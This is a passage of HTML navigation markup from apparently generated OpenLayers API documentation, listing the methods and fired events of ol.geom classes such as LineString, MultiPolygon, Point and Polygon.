<li data-name="ol.geom.GeometryCollection#on" class="">
<a href="ol.geom.GeometryCollection.html#on">on</a>
</li>
<li data-name="ol.geom.GeometryCollection#once" class="">
<a href="ol.geom.GeometryCollection.html#once">once</a>
</li>
<li data-name="ol.geom.GeometryCollection#set" class="">
<a href="ol.geom.GeometryCollection.html#set">set</a>
</li>
<li data-name="ol.geom.GeometryCollection#setGeometries" class="">
<a href="ol.geom.GeometryCollection.html#setGeometries">setGeometries</a>
</li>
<li data-name="ol.geom.GeometryCollection#setProperties" class="">
<a href="ol.geom.GeometryCollection.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.GeometryCollection#transform" class="">
<a href="ol.geom.GeometryCollection.html#transform">transform</a>
</li>
<li data-name="ol.geom.GeometryCollection#translate" class="unstable">
<a href="ol.geom.GeometryCollection.html#translate">translate</a>
</li>
<li data-name="ol.geom.GeometryCollection#un" class="">
<a href="ol.geom.GeometryCollection.html#un">un</a>
</li>
<li data-name="ol.geom.GeometryCollection#unByKey" class="">
<a href="ol.geom.GeometryCollection.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.GeometryCollection#unset" class="">
<a href="ol.geom.GeometryCollection.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.geom.LineString">
<span class="title">
<a href="ol.geom.LineString.html">ol.geom.LineString</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.LineString#appendCoordinate" class="">
<a href="ol.geom.LineString.html#appendCoordinate">appendCoordinate</a>
</li>
<li data-name="ol.geom.LineString#applyTransform" class="">
<a href="ol.geom.LineString.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.geom.LineString#changed" class="unstable">
<a href="ol.geom.LineString.html#changed">changed</a>
</li>
<li data-name="ol.geom.LineString#clone" class="">
<a href="ol.geom.LineString.html#clone">clone</a>
</li>
<li data-name="ol.geom.LineString#forEachSegment" class="unstable">
<a href="ol.geom.LineString.html#forEachSegment">forEachSegment</a>
</li>
<li data-name="ol.geom.LineString#get" class="">
<a href="ol.geom.LineString.html#get">get</a>
</li>
<li data-name="ol.geom.LineString#getClosestPoint" class="">
<a href="ol.geom.LineString.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.LineString#getCoordinateAtM" class="">
<a href="ol.geom.LineString.html#getCoordinateAtM">getCoordinateAtM</a>
</li>
<li data-name="ol.geom.LineString#getCoordinates" class="">
<a href="ol.geom.LineString.html#getCoordinates">getCoordinates</a>
</li>
<li data-name="ol.geom.LineString#getExtent" class="">
<a href="ol.geom.LineString.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.LineString#getFirstCoordinate" class="">
<a href="ol.geom.LineString.html#getFirstCoordinate">getFirstCoordinate</a>
</li>
<li data-name="ol.geom.LineString#getKeys" class="">
<a href="ol.geom.LineString.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.LineString#getLastCoordinate" class="">
<a href="ol.geom.LineString.html#getLastCoordinate">getLastCoordinate</a>
</li>
<li data-name="ol.geom.LineString#getLayout" class="">
<a href="ol.geom.LineString.html#getLayout">getLayout</a>
</li>
<li data-name="ol.geom.LineString#getLength" class="">
<a href="ol.geom.LineString.html#getLength">getLength</a>
</li>
<li data-name="ol.geom.LineString#getProperties" class="">
<a href="ol.geom.LineString.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.LineString#getRevision" class="unstable">
<a href="ol.geom.LineString.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.LineString#getType" class="">
<a href="ol.geom.LineString.html#getType">getType</a>
</li>
<li data-name="ol.geom.LineString#intersectsExtent" class="">
<a href="ol.geom.LineString.html#intersectsExtent">intersectsExtent</a>
</li>
<li data-name="ol.geom.LineString#on" class="">
<a href="ol.geom.LineString.html#on">on</a>
</li>
<li data-name="ol.geom.LineString#once" class="">
<a href="ol.geom.LineString.html#once">once</a>
</li>
<li data-name="ol.geom.LineString#set" class="">
<a href="ol.geom.LineString.html#set">set</a>
</li>
<li data-name="ol.geom.LineString#setCoordinates" class="">
<a href="ol.geom.LineString.html#setCoordinates">setCoordinates</a>
</li>
<li data-name="ol.geom.LineString#setProperties" class="">
<a href="ol.geom.LineString.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.LineString#transform" class="">
<a href="ol.geom.LineString.html#transform">transform</a>
</li>
<li data-name="ol.geom.LineString#translate" class="">
<a href="ol.geom.LineString.html#translate">translate</a>
</li>
<li data-name="ol.geom.LineString#un" class="">
<a href="ol.geom.LineString.html#un">un</a>
</li>
<li data-name="ol.geom.LineString#unByKey" class="">
<a href="ol.geom.LineString.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.LineString#unset" class="">
<a href="ol.geom.LineString.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.geom.LinearRing">
<span class="title">
<a href="ol.geom.LinearRing.html">ol.geom.LinearRing</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.LinearRing#applyTransform" class="">
<a href="ol.geom.LinearRing.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.geom.LinearRing#changed" class="unstable">
<a href="ol.geom.LinearRing.html#changed">changed</a>
</li>
<li data-name="ol.geom.LinearRing#clone" class="">
<a href="ol.geom.LinearRing.html#clone">clone</a>
</li>
<li data-name="ol.geom.LinearRing#get" class="">
<a href="ol.geom.LinearRing.html#get">get</a>
</li>
<li data-name="ol.geom.LinearRing#getArea" class="">
<a href="ol.geom.LinearRing.html#getArea">getArea</a>
</li>
<li data-name="ol.geom.LinearRing#getClosestPoint" class="">
<a href="ol.geom.LinearRing.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.LinearRing#getCoordinates" class="">
<a href="ol.geom.LinearRing.html#getCoordinates">getCoordinates</a>
</li>
<li data-name="ol.geom.LinearRing#getExtent" class="">
<a href="ol.geom.LinearRing.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.LinearRing#getFirstCoordinate" class="">
<a href="ol.geom.LinearRing.html#getFirstCoordinate">getFirstCoordinate</a>
</li>
<li data-name="ol.geom.LinearRing#getKeys" class="">
<a href="ol.geom.LinearRing.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.LinearRing#getLastCoordinate" class="">
<a href="ol.geom.LinearRing.html#getLastCoordinate">getLastCoordinate</a>
</li>
<li data-name="ol.geom.LinearRing#getLayout" class="">
<a href="ol.geom.LinearRing.html#getLayout">getLayout</a>
</li>
<li data-name="ol.geom.LinearRing#getProperties" class="">
<a href="ol.geom.LinearRing.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.LinearRing#getRevision" class="unstable">
<a href="ol.geom.LinearRing.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.LinearRing#getType" class="">
<a href="ol.geom.LinearRing.html#getType">getType</a>
</li>
<li data-name="ol.geom.LinearRing#on" class="">
<a href="ol.geom.LinearRing.html#on">on</a>
</li>
<li data-name="ol.geom.LinearRing#once" class="">
<a href="ol.geom.LinearRing.html#once">once</a>
</li>
<li data-name="ol.geom.LinearRing#set" class="">
<a href="ol.geom.LinearRing.html#set">set</a>
</li>
<li data-name="ol.geom.LinearRing#setCoordinates" class="">
<a href="ol.geom.LinearRing.html#setCoordinates">setCoordinates</a>
</li>
<li data-name="ol.geom.LinearRing#setProperties" class="">
<a href="ol.geom.LinearRing.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.LinearRing#transform" class="">
<a href="ol.geom.LinearRing.html#transform">transform</a>
</li>
<li data-name="ol.geom.LinearRing#translate" class="">
<a href="ol.geom.LinearRing.html#translate">translate</a>
</li>
<li data-name="ol.geom.LinearRing#un" class="">
<a href="ol.geom.LinearRing.html#un">un</a>
</li>
<li data-name="ol.geom.LinearRing#unByKey" class="">
<a href="ol.geom.LinearRing.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.LinearRing#unset" class="">
<a href="ol.geom.LinearRing.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.geom.MultiLineString">
<span class="title">
<a href="ol.geom.MultiLineString.html">ol.geom.MultiLineString</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.MultiLineString#appendLineString" class="">
<a href="ol.geom.MultiLineString.html#appendLineString">appendLineString</a>
</li>
<li data-name="ol.geom.MultiLineString#applyTransform" class="">
<a href="ol.geom.MultiLineString.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.geom.MultiLineString#changed" class="unstable">
<a href="ol.geom.MultiLineString.html#changed">changed</a>
</li>
<li data-name="ol.geom.MultiLineString#clone" class="">
<a href="ol.geom.MultiLineString.html#clone">clone</a>
</li>
<li data-name="ol.geom.MultiLineString#get" class="">
<a href="ol.geom.MultiLineString.html#get">get</a>
</li>
<li data-name="ol.geom.MultiLineString#getClosestPoint" class="">
<a href="ol.geom.MultiLineString.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.MultiLineString#getCoordinateAtM" class="">
<a href="ol.geom.MultiLineString.html#getCoordinateAtM">getCoordinateAtM</a>
</li>
<li data-name="ol.geom.MultiLineString#getCoordinates" class="">
<a href="ol.geom.MultiLineString.html#getCoordinates">getCoordinates</a>
</li>
<li data-name="ol.geom.MultiLineString#getExtent" class="">
<a href="ol.geom.MultiLineString.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.MultiLineString#getFirstCoordinate" class="">
<a href="ol.geom.MultiLineString.html#getFirstCoordinate">getFirstCoordinate</a>
</li>
<li data-name="ol.geom.MultiLineString#getKeys" class="">
<a href="ol.geom.MultiLineString.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.MultiLineString#getLastCoordinate" class="">
<a href="ol.geom.MultiLineString.html#getLastCoordinate">getLastCoordinate</a>
</li>
<li data-name="ol.geom.MultiLineString#getLayout" class="">
<a href="ol.geom.MultiLineString.html#getLayout">getLayout</a>
</li>
<li data-name="ol.geom.MultiLineString#getLineString" class="">
<a href="ol.geom.MultiLineString.html#getLineString">getLineString</a>
</li>
<li data-name="ol.geom.MultiLineString#getLineStrings" class="">
<a href="ol.geom.MultiLineString.html#getLineStrings">getLineStrings</a>
</li>
<li data-name="ol.geom.MultiLineString#getProperties" class="">
<a href="ol.geom.MultiLineString.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.MultiLineString#getRevision" class="unstable">
<a href="ol.geom.MultiLineString.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.MultiLineString#getType" class="">
<a href="ol.geom.MultiLineString.html#getType">getType</a>
</li>
<li data-name="ol.geom.MultiLineString#intersectsExtent" class="">
<a href="ol.geom.MultiLineString.html#intersectsExtent">intersectsExtent</a>
</li>
<li data-name="ol.geom.MultiLineString#on" class="">
<a href="ol.geom.MultiLineString.html#on">on</a>
</li>
<li data-name="ol.geom.MultiLineString#once" class="">
<a href="ol.geom.MultiLineString.html#once">once</a>
</li>
<li data-name="ol.geom.MultiLineString#set" class="">
<a href="ol.geom.MultiLineString.html#set">set</a>
</li>
<li data-name="ol.geom.MultiLineString#setCoordinates" class="">
<a href="ol.geom.MultiLineString.html#setCoordinates">setCoordinates</a>
</li>
<li data-name="ol.geom.MultiLineString#setProperties" class="">
<a href="ol.geom.MultiLineString.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.MultiLineString#transform" class="">
<a href="ol.geom.MultiLineString.html#transform">transform</a>
</li>
<li data-name="ol.geom.MultiLineString#translate" class="">
<a href="ol.geom.MultiLineString.html#translate">translate</a>
</li>
<li data-name="ol.geom.MultiLineString#un" class="">
<a href="ol.geom.MultiLineString.html#un">un</a>
</li>
<li data-name="ol.geom.MultiLineString#unByKey" class="">
<a href="ol.geom.MultiLineString.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.MultiLineString#unset" class="">
<a href="ol.geom.MultiLineString.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.geom.MultiPoint">
<span class="title">
<a href="ol.geom.MultiPoint.html">ol.geom.MultiPoint</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.MultiPoint#appendPoint" class="">
<a href="ol.geom.MultiPoint.html#appendPoint">appendPoint</a>
</li>
<li data-name="ol.geom.MultiPoint#applyTransform" class="">
<a href="ol.geom.MultiPoint.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.geom.MultiPoint#changed" class="unstable">
<a href="ol.geom.MultiPoint.html#changed">changed</a>
</li>
<li data-name="ol.geom.MultiPoint#clone" class="">
<a href="ol.geom.MultiPoint.html#clone">clone</a>
</li>
<li data-name="ol.geom.MultiPoint#get" class="">
<a href="ol.geom.MultiPoint.html#get">get</a>
</li>
<li data-name="ol.geom.MultiPoint#getClosestPoint" class="">
<a href="ol.geom.MultiPoint.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.MultiPoint#getCoordinates" class="">
<a href="ol.geom.MultiPoint.html#getCoordinates">getCoordinates</a>
</li>
<li data-name="ol.geom.MultiPoint#getExtent" class="">
<a href="ol.geom.MultiPoint.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.MultiPoint#getFirstCoordinate" class="">
<a href="ol.geom.MultiPoint.html#getFirstCoordinate">getFirstCoordinate</a>
</li>
<li data-name="ol.geom.MultiPoint#getKeys" class="">
<a href="ol.geom.MultiPoint.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.MultiPoint#getLastCoordinate" class="">
<a href="ol.geom.MultiPoint.html#getLastCoordinate">getLastCoordinate</a>
</li>
<li data-name="ol.geom.MultiPoint#getLayout" class="">
<a href="ol.geom.MultiPoint.html#getLayout">getLayout</a>
</li>
<li data-name="ol.geom.MultiPoint#getPoint" class="">
<a href="ol.geom.MultiPoint.html#getPoint">getPoint</a>
</li>
<li data-name="ol.geom.MultiPoint#getPoints" class="">
<a href="ol.geom.MultiPoint.html#getPoints">getPoints</a>
</li>
<li data-name="ol.geom.MultiPoint#getProperties" class="">
<a href="ol.geom.MultiPoint.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.MultiPoint#getRevision" class="unstable">
<a href="ol.geom.MultiPoint.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.MultiPoint#getType" class="">
<a href="ol.geom.MultiPoint.html#getType">getType</a>
</li>
<li data-name="ol.geom.MultiPoint#intersectsExtent" class="">
<a href="ol.geom.MultiPoint.html#intersectsExtent">intersectsExtent</a>
</li>
<li data-name="ol.geom.MultiPoint#on" class="">
<a href="ol.geom.MultiPoint.html#on">on</a>
</li>
<li data-name="ol.geom.MultiPoint#once" class="">
<a href="ol.geom.MultiPoint.html#once">once</a>
</li>
<li data-name="ol.geom.MultiPoint#set" class="">
<a href="ol.geom.MultiPoint.html#set">set</a>
</li>
<li data-name="ol.geom.MultiPoint#setCoordinates" class="">
<a href="ol.geom.MultiPoint.html#setCoordinates">setCoordinates</a>
</li>
<li data-name="ol.geom.MultiPoint#setProperties" class="">
<a href="ol.geom.MultiPoint.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.MultiPoint#transform" class="">
<a href="ol.geom.MultiPoint.html#transform">transform</a>
</li>
<li data-name="ol.geom.MultiPoint#translate" class="">
<a href="ol.geom.MultiPoint.html#translate">translate</a>
</li>
<li data-name="ol.geom.MultiPoint#un" class="">
<a href="ol.geom.MultiPoint.html#un">un</a>
</li>
<li data-name="ol.geom.MultiPoint#unByKey" class="">
<a href="ol.geom.MultiPoint.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.MultiPoint#unset" class="">
<a href="ol.geom.MultiPoint.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.geom.MultiPolygon">
<span class="title">
<a href="ol.geom.MultiPolygon.html">ol.geom.MultiPolygon</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.MultiPolygon#appendPolygon" class="">
<a href="ol.geom.MultiPolygon.html#appendPolygon">appendPolygon</a>
</li>
<li data-name="ol.geom.MultiPolygon#applyTransform" class="">
<a href="ol.geom.MultiPolygon.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.geom.MultiPolygon#changed" class="unstable">
<a href="ol.geom.MultiPolygon.html#changed">changed</a>
</li>
<li data-name="ol.geom.MultiPolygon#clone" class="">
<a href="ol.geom.MultiPolygon.html#clone">clone</a>
</li>
<li data-name="ol.geom.MultiPolygon#get" class="">
<a href="ol.geom.MultiPolygon.html#get">get</a>
</li>
<li data-name="ol.geom.MultiPolygon#getArea" class="">
<a href="ol.geom.MultiPolygon.html#getArea">getArea</a>
</li>
<li data-name="ol.geom.MultiPolygon#getClosestPoint" class="">
<a href="ol.geom.MultiPolygon.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.MultiPolygon#getCoordinates" class="">
<a href="ol.geom.MultiPolygon.html#getCoordinates">getCoordinates</a>
</li>
<li data-name="ol.geom.MultiPolygon#getExtent" class="">
<a href="ol.geom.MultiPolygon.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.MultiPolygon#getFirstCoordinate" class="">
<a href="ol.geom.MultiPolygon.html#getFirstCoordinate">getFirstCoordinate</a>
</li>
<li data-name="ol.geom.MultiPolygon#getInteriorPoints" class="">
<a href="ol.geom.MultiPolygon.html#getInteriorPoints">getInteriorPoints</a>
</li>
<li data-name="ol.geom.MultiPolygon#getKeys" class="">
<a href="ol.geom.MultiPolygon.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.MultiPolygon#getLastCoordinate" class="">
<a href="ol.geom.MultiPolygon.html#getLastCoordinate">getLastCoordinate</a>
</li>
<li data-name="ol.geom.MultiPolygon#getLayout" class="">
<a href="ol.geom.MultiPolygon.html#getLayout">getLayout</a>
</li>
<li data-name="ol.geom.MultiPolygon#getPolygon" class="">
<a href="ol.geom.MultiPolygon.html#getPolygon">getPolygon</a>
</li>
<li data-name="ol.geom.MultiPolygon#getPolygons" class="">
<a href="ol.geom.MultiPolygon.html#getPolygons">getPolygons</a>
</li>
<li data-name="ol.geom.MultiPolygon#getProperties" class="">
<a href="ol.geom.MultiPolygon.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.MultiPolygon#getRevision" class="unstable">
<a href="ol.geom.MultiPolygon.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.MultiPolygon#getType" class="">
<a href="ol.geom.MultiPolygon.html#getType">getType</a>
</li>
<li data-name="ol.geom.MultiPolygon#intersectsExtent" class="">
<a href="ol.geom.MultiPolygon.html#intersectsExtent">intersectsExtent</a>
</li>
<li data-name="ol.geom.MultiPolygon#on" class="">
<a href="ol.geom.MultiPolygon.html#on">on</a>
</li>
<li data-name="ol.geom.MultiPolygon#once" class="">
<a href="ol.geom.MultiPolygon.html#once">once</a>
</li>
<li data-name="ol.geom.MultiPolygon#set" class="">
<a href="ol.geom.MultiPolygon.html#set">set</a>
</li>
<li data-name="ol.geom.MultiPolygon#setCoordinates" class="">
<a href="ol.geom.MultiPolygon.html#setCoordinates">setCoordinates</a>
</li>
<li data-name="ol.geom.MultiPolygon#setProperties" class="">
<a href="ol.geom.MultiPolygon.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.MultiPolygon#transform" class="">
<a href="ol.geom.MultiPolygon.html#transform">transform</a>
</li>
<li data-name="ol.geom.MultiPolygon#translate" class="">
<a href="ol.geom.MultiPolygon.html#translate">translate</a>
</li>
<li data-name="ol.geom.MultiPolygon#un" class="">
<a href="ol.geom.MultiPolygon.html#un">un</a>
</li>
<li data-name="ol.geom.MultiPolygon#unByKey" class="">
<a href="ol.geom.MultiPolygon.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.MultiPolygon#unset" class="">
<a href="ol.geom.MultiPolygon.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.geom.Point">
<span class="title">
<a href="ol.geom.Point.html">ol.geom.Point</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.Point#applyTransform" class="">
<a href="ol.geom.Point.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.geom.Point#changed" class="unstable">
<a href="ol.geom.Point.html#changed">changed</a>
</li>
<li data-name="ol.geom.Point#clone" class="">
<a href="ol.geom.Point.html#clone">clone</a>
</li>
<li data-name="ol.geom.Point#get" class="">
<a href="ol.geom.Point.html#get">get</a>
</li>
<li data-name="ol.geom.Point#getClosestPoint" class="">
<a href="ol.geom.Point.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.Point#getCoordinates" class="">
<a href="ol.geom.Point.html#getCoordinates">getCoordinates</a>
</li>
<li data-name="ol.geom.Point#getExtent" class="">
<a href="ol.geom.Point.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.Point#getFirstCoordinate" class="">
<a href="ol.geom.Point.html#getFirstCoordinate">getFirstCoordinate</a>
</li>
<li data-name="ol.geom.Point#getKeys" class="">
<a href="ol.geom.Point.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.Point#getLastCoordinate" class="">
<a href="ol.geom.Point.html#getLastCoordinate">getLastCoordinate</a>
</li>
<li data-name="ol.geom.Point#getLayout" class="">
<a href="ol.geom.Point.html#getLayout">getLayout</a>
</li>
<li data-name="ol.geom.Point#getProperties" class="">
<a href="ol.geom.Point.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.Point#getRevision" class="unstable">
<a href="ol.geom.Point.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.Point#getType" class="">
<a href="ol.geom.Point.html#getType">getType</a>
</li>
<li data-name="ol.geom.Point#intersectsExtent" class="">
<a href="ol.geom.Point.html#intersectsExtent">intersectsExtent</a>
</li>
<li data-name="ol.geom.Point#on" class="">
<a href="ol.geom.Point.html#on">on</a>
</li>
<li data-name="ol.geom.Point#once" class="">
<a href="ol.geom.Point.html#once">once</a>
</li>
<li data-name="ol.geom.Point#set" class="">
<a href="ol.geom.Point.html#set">set</a>
</li>
<li data-name="ol.geom.Point#setCoordinates" class="">
<a href="ol.geom.Point.html#setCoordinates">setCoordinates</a>
</li>
<li data-name="ol.geom.Point#setProperties" class="">
<a href="ol.geom.Point.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.Point#transform" class="">
<a href="ol.geom.Point.html#transform">transform</a>
</li>
<li data-name="ol.geom.Point#translate" class="">
<a href="ol.geom.Point.html#translate">translate</a>
</li>
<li data-name="ol.geom.Point#un" class="">
<a href="ol.geom.Point.html#un">un</a>
</li>
<li data-name="ol.geom.Point#unByKey" class="">
<a href="ol.geom.Point.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.Point#unset" class="">
<a href="ol.geom.Point.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.geom.Polygon">
<span class="title">
<a href="ol.geom.Polygon.html">ol.geom.Polygon</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.Polygon.circular" class="">
<a href="ol.geom.Polygon.html#circular">circular</a>
</li>
<li data-name="ol.geom.Polygon.fromCircle" class="unstable">
<a href="ol.geom.Polygon.html#fromCircle">fromCircle</a>
</li>
<li data-name="ol.geom.Polygon.fromExtent" class="unstable">
<a href="ol.geom.Polygon.html#fromExtent">fromExtent</a>
</li>
<li data-name="ol.geom.Polygon#appendLinearRing" class="">
<a href="ol.geom.Polygon.html#appendLinearRing">appendLinearRing</a>
</li>
<li data-name="ol.geom.Polygon#applyTransform" class="">
<a href="ol.geom.Polygon.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.geom.Polygon#changed" class="unstable">
<a href="ol.geom.Polygon.html#changed">changed</a>
</li>
<li data-name="ol.geom.Polygon#clone" class="">
<a href="ol.geom.Polygon.html#clone">clone</a>
</li>
<li data-name="ol.geom.Polygon#get" class="">
<a href="ol.geom.Polygon.html#get">get</a>
</li>
<li data-name="ol.geom.Polygon#getArea" class="">
<a href="ol.geom.Polygon.html#getArea">getArea</a>
</li>
<li data-name="ol.geom.Polygon#getClosestPoint" class="">
<a href="ol.geom.Polygon.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.Polygon#getCoordinates" class="">
<a href="ol.geom.Polygon.html#getCoordinates">getCoordinates</a>
</li>
<li data-name="ol.geom.Polygon#getExtent" class="">
<a href="ol.geom.Polygon.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.Polygon#getFirstCoordinate" class="">
<a href="ol.geom.Polygon.html#getFirstCoordinate">getFirstCoordinate</a>
</li>
<li data-name="ol.geom.Polygon#getInteriorPoint" class="">
<a href="ol.geom.Polygon.html#getInteriorPoint">getInteriorPoint</a>
</li>
<li data-name="ol.geom.Polygon#getKeys" class="">
<a href="ol.geom.Polygon.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.Polygon#getLastCoordinate" class="">
<a href="ol.geom.Polygon.html#getLastCoordinate">getLastCoordinate</a>
</li>
<li data-name="ol.geom.Polygon#getLayout" class="">
<a href="ol.geom.Polygon.html#getLayout">getLayout</a>
</li>
<li data-name="ol.geom.Polygon#getLinearRing" class="">
<a href="ol.geom.Polygon.html#getLinearRing">getLinearRing</a>
</li>
<li data-name="ol.geom.Polygon#getLinearRingCount" class="unstable">
<a href="ol.geom.Polygon.html#getLinearRingCount">getLinearRingCount</a>
</li>
<li data-name="ol.geom.Polygon#getLinearRings" class="">
<a href="ol.geom.Polygon.html#getLinearRings">getLinearRings</a>
</li>
<li data-name="ol.geom.Polygon#getProperties" class="">
<a href="ol.geom.Polygon.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.Polygon#getRevision" class="unstable">
<a href="ol.geom.Polygon.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.Polygon#getType" class="">
<a href="ol.geom.Polygon.html#getType">getType</a>
</li>
<li data-name="ol.geom.Polygon#intersectsExtent" class="">
<a href="ol.geom.Polygon.html#intersectsExtent">intersectsExtent</a>
</li>
<li data-name="ol.geom.Polygon#on" class="">
<a href="ol.geom.Polygon.html#on">on</a>
</li>
<li data-name="ol.geom.Polygon#once" class="">
<a href="ol.geom.Polygon.html#once">once</a>
</li>
<li data-name="ol.geom.Polygon#set" class="">
<a href="ol.geom.Polygon.html#set">set</a>
</li>
<li data-name="ol.geom.Polygon#setCoordinates" class="">
<a href="ol.geom.Polygon.html#setCoordinates">setCoordinates</a>
</li>
<li data-name="ol.geom.Polygon#setProperties" class="">
<a href="ol.geom.Polygon.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.Polygon#transform" class="">
<a href="ol.geom.Polygon.html#transform">transform</a>
</li>
<li data-name="ol.geom.Polygon#translate" class="">
<a href="ol.geom.Polygon.html#translate">translate</a>
</li>
<li data-name="ol.geom.Polygon#un" class="">
<a href="ol.geom.Polygon.html#un">un</a>
</li>
<li data-name="ol.geom.Polygon#unByKey" class="">
<a href="ol.geom.Polygon.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.Polygon#unset" class="">
<a href="ol.geom.Polygon.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
